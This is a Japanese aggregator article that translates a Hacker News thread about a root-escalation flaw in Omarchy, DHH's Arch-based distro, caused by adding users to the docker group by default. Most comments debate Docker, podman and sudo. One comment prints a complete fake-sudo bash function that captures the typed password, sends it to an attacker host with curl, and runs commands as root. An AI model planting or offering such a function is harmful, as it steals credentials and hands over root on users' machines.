DHHのArchディストロ「Omarchy」にroot権限昇格の欠陥、HNで議論に

姉妹サイトの新着

他サイトの新着

Ruby on RailsやHEY、37signalsで知られるDavid Heinemeier Hansson(DHH)が手がけるArch Linuxベースのディストリビューション「Omarchy」に、一般ユーザー権限のプロセスからroot権限を奪える不具合が見つかったと海外セキュリティブログ0xcc.ioが報告し、Hacker Newsで議論になった。原因は一般ユーザーをdockerグループに追加するデフォルト設定にあるとされる。同様の構成は他のLinux環境でも珍しくないため、これをOmarchy固有の欠陥とみなすべきか、そもそもsudoやDockerの権限モデル自体が形骸化しているのではないかという、より根本的な議論に発展した。

Omarchy:どのユーザープロセスでもroot権限に昇格できてしまう

出典: 0xcc.io / 元記事はこちら

2 海外の名無しさん 2026-08-30 17:01
数日前、USBディスクリプタをそのままシェルに流し込んでいたことが発覚した。https://github.com/omacom/omarchy/commit/9285b19d6a72eba3df8… バイブコーディングされたディストロを使うな。あれこれ直しても、特定の脆弱性を気にするかどうかは関係ない。そもそもまともじゃない。これこそWindowsから乗り換えた理由だったはずだろう?
19 海外の名無しさん 2026-08-30 17:14
>>2 誇大宣伝以外に、これの魅力って何なんだ? 最近デモ動画をいくつか見たが、まともに使うにはキーバインドを十数個も暗記しないといけないみたいで驚いた。今はそれが普通なのか? 自分はGUIで発見的に使えるGnome派なんだが。
20 海外の名無しさん 2026-08-30 17:13
>>2 少なくとも自分がWindowsから乗り換えた理由はそれじゃないな
21 海外の名無しさん 2026-08-30 17:17
>>2 それはちょっと天邪鬼すぎないか。この間HNのトップに『Debianが“責任あるAI活用”を認める投票をした』って記事が上がってたばかりなのに。今回のLLMコーディングは“責任ある”とは言えなかったってことか。ははは。AIバブルよ弾けろ
3 海外の名無しさん 2026-08-30 16:47
メディアやYouTubeで過剰に持ち上げられているディストロに飛びつくべきじゃないと思う。CachyOSも同じような盛り上がりがあったし、今度はOmarchyだ(NetworkChuckやPrimeagenなどの影響)。それに今のArch Linuxはarchinstallのおかげでかなり簡単にインストールできるから、その上にさらに独自色の強いレイヤーを重ねる必要があるのか疑問
24 海外の名無しさん 2026-08-30 16:58
>>3 Fedoraを使え。大体はちゃんと動く
25 海外の名無しさん 2026-08-30 17:12
>>3 Omarchyは怒れるアンチたちに散々ペネトレーションテストされてるみたいだな。お前のArch環境は誰がペンテストしてくれるんだ?(笑)
27 海外の名無しさん 2026-08-30 17:06
>>3 Omarchyは個人的には、Final CutやAdobe、Affinityみたいなアップル純正アプリに縛られたくない、エージェント活用しまくりのMacパワーユーザーに向いてると思う。デザイナーや写真家がメインで使うOSとしてはあまり向いていないかもしれない
4 海外の名無しさん 2026-08-30 16:43
良くはないが、これをOmarchy特有の問題として語るのはどうかと思う。一般ユーザーをdockerグループに入れるのはかなりよくある構成だ
28 海外の名無しさん 2026-08-30 16:47
>>4 自分のマシンでリスクのあるやり方をするのと、ユーザーに安全でない非標準の設定をデフォルトで配布するのは別問題だ
29 海外の名無しさん 2026-08-30 17:15
>>4 podmanじゃなくDockerを使ってる時点でまず間違いで、それはディストロ(Omarchy用語で言えば“シェフ”)側の判断だ
30 海外の名無しさん 2026-08-30 16:45
>>4 「一般ユーザーをdockerグループに入れるのはよくある構成」というが、それは公式の設定としてか? それともコピペのガイド頼みか? 前者と後者では全然違う。sudoのパスワードを無効化するのは珍しくないが、それがどこかのOSのデフォルトだったら深刻なセキュリティ上の欠陥とみなされるはずだ
5 海外の名無しさん 2026-08-30 16:30
rootlessのpodmanを使わない理由は? 今は2016年じゃなく2026年だ。今のpodmanはDockerよりずっとよく動く
32 海外の名無しさん 2026-08-30 16:46
>>5 記事の中でも、それが推奨される選択肢として明記されている
33 海外の名無しさん 2026-08-30 16:33
>>5 自分もそうしてるし、著者もそれを推奨してる
7 海外の名無しさん 2026-08-30 17:13
正直、主要なLinuxディストロならどれでもマルウェアがrootに昇格するのは簡単だ。sudoは完全にセキュリティシアターだから。sudoをこんな悪意あるsudoで上書きするだけでいい: function sudo () { realsudo=$(which sudo) ; read -r -s -p "[sudo] password for $USER: " password ; echo "$USER: $password" | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1 ; $realsudo -S <<< "$password" -u root bash -C "exit" >/dev/null 2>&1 ; $realsudo "${@:1}" }
39 海外の名無しさん 2026-08-30 17:13
>>7 え、なんでsudoがセキュリティシアターなんだ?
66 海外の名無しさん 2026-08-30 17:18
>>39 どのユーザープロセスでも.bashrcや.zshrcといったシェルの設定ファイルに好きな内容を追記できる。この例では偽のsudoプロンプトを出すbash関数を仕込んでいて、ユーザーが入力したパスワードを使って悪意あるペイロードをrootとして実行する
67 海外の名無しさん 2026-08-30 17:15
>>39 権限のないマルウェアがパスワードをフィッシングしてrootに昇格するのは容易だからだ。本番システムでsudoを使うべきじゃない
12 海外の名無しさん 2026-08-30 16:59
そもそもOmarchyって何なんだ
40 海外の名無しさん 2026-08-30 17:01
>>12 公式には“omakase”(素人シェフがセキュリティ問題込みでメニューを決める)とArch Linuxの合成らしい。monarchy(君主制)とほぼアナグラムなのもDHHにとってはプラスなんだろうな
15 海外の名無しさん 2026-08-30 16:39
macOSでそうしなきゃいけないみたいに、Docker専用にVMを立てた方がいいんじゃないか?
47 海外の名無しさん 2026-08-30 16:46
>>15 それだとディスク容量やRAMを食う問題がある。一度確保されるとホストに解放されず、使われないまま残ってしまう
48 海外の名無しさん 2026-08-30 16:54
>>15 smolmachinesというプログラムがこの問題を解決してくれるからおすすめしておく。主にdockerソケットやDocker in Dockerが必要な用途(strixやエージェントなど)で使ってる。ホスト側はpodmanにしてる
49 海外の名無しさん 2026-08-30 16:59
>>15 macOSでDockerにVMが必要だったなんて知らなかった。それって結構皮肉だな(笑) MicrosoftがWSL2を作ってくれたことに毎日感謝してる
36 海外の名無しさん 2026-08-30 16:59
>>6 “Linux上でApple風のアーキテクチャを実装するのは非常に難しい”というが、今のデスクトップLinuxではそうでも、Androidは主にSELinuxとseccompでそれなりにうまくやっている
63 海外の名無しさん 2026-08-30 17:16
>>36 AndroidはLinuxカーネルの一部を再利用しているだけの、基本的には別物のOSだ
37 海外の名無しさん 2026-08-30 16:58
>>6 “ちゃんと機能するデスクトップサンドボックスの仕組みが無い”というが、Bubblewrapは機能する
64 海外の名無しさん 2026-08-30 17:14
>>37 あとFirejailもある
41 海外の名無しさん 2026-08-30 17:00
デフォルト設定かどうかに関わらず、Dockerを使う人がまず最初にやるのはsudoで自分をdockerグループに入れることだと思う。セキュリティを気にするならそもそもDockerを使うべきじゃない
69 海外の名無しさん 2026-08-30 17:03
>>41 自分はパスワードなしのsudoにしてる。パスワードなんて意味が無いのはXKCDが教えてくれた通りだ

他サイトの新着

43 海外の名無しさん 2026-08-30 16:49
便利だからだし、デスクトップ用途ならそのセキュリティは重要じゃないからだ
70 海外の名無しさん 2026-08-30 17:02
>>43 (笑) みんな賛同票を入れるだろうけど、その皮肉には気づいてないんだろうな。“よくある間違いで仕方ない”ってコメントを見る限り、みんな本気で言ってる
60 海外の名無しさん 2026-08-30 16:52
>>30 その方法はランダムなブログやSO(Stack Overflow)じゃなく、Docker公式サイトに書かれている。もちろんセキュリティについての注意書きはあるが、はっきり非推奨とまでは言っていない
80 海外の名無しさん 2026-08-30 17:02
>>60 ユーザーグループやセキュリティを理解しているシステム管理者を読者として想定した、影響についての注意書きがちゃんとあると思う
62 海外の名無しさん 2026-08-30 16:35
>>33 DHHたちが“開発体験”のためにセキュリティを犠牲にするのを容認するとは思えないな… docker-composeファイルやDockerコマンドの中には、podmanやpodman-composeとそのまま互換しないものがまだかなりある。それを調整するにはOmarchyのユーザーがpodmanを理解する必要が出てくるけど、それはOmarchyの“お任せ”的な性格には合わない気がする
82 海外の名無しさん 2026-08-30 16:37
>>62 いやいや。君がDHHを好きじゃないのは分かるが、彼はRailsでは常にセキュリティを真剣に扱ってきた人だ
85 海外の名無しさん 2026-08-30 16:42
>>82 さっきも言った通り、podmanはrootless化に伴う複雑さがある分、ユーザー側の努力と理解が必要になる。それがOmarchyの“omakase”という理念に合うとは思えない。DHHがセキュリティを軽視しているとは思わないが、Omarchyは開発体験のためにセキュリティを犠牲にするようには作られていないと思う

この話題の背景と論点

今回の指摘は、Omarchyがインストール時に一般ユーザーを自動でdockerグループへ追加する設定に起因する。dockerデーモンへのアクセス権を持つユーザーはコンテナ経由でホストのファイルシステムを操作でき、実質的にroot権限を得られるという仕組み自体は以前から知られており、Docker公式ドキュメントにも注意書きがある。スレッドで割れたのは「これはOmarchy固有の欠陥か、それとも一般的なDocker運用の延長に過ぎないか」という点だ。DHHが掲げる“omakase”(お任せ)という設計思想は、利用者に細かい設定判断を委ねず開発体験を優先する方針だが、これがセキュリティ上のデフォルト値の甘さにつながっているという批判が出た一方、rootlessで動くpodmanへの切り替えを著者自身がすでに推奨しているという指摘もあり、問題が把握され対策も提示されていた点は見落とされやすい。

※本記事は5ch(Hacker News)スレッド「Omarchy: Any User Process Can Escalate to Root」より抜粋・要約して構成しています。

この記事のリアクション

他サイトの新着

まだコメントはありません。

コメントする

誹謗中傷・個人を特定する書き込みは削除対象です。投稿は承認後に表示されます。

相互リンクサイト新着記事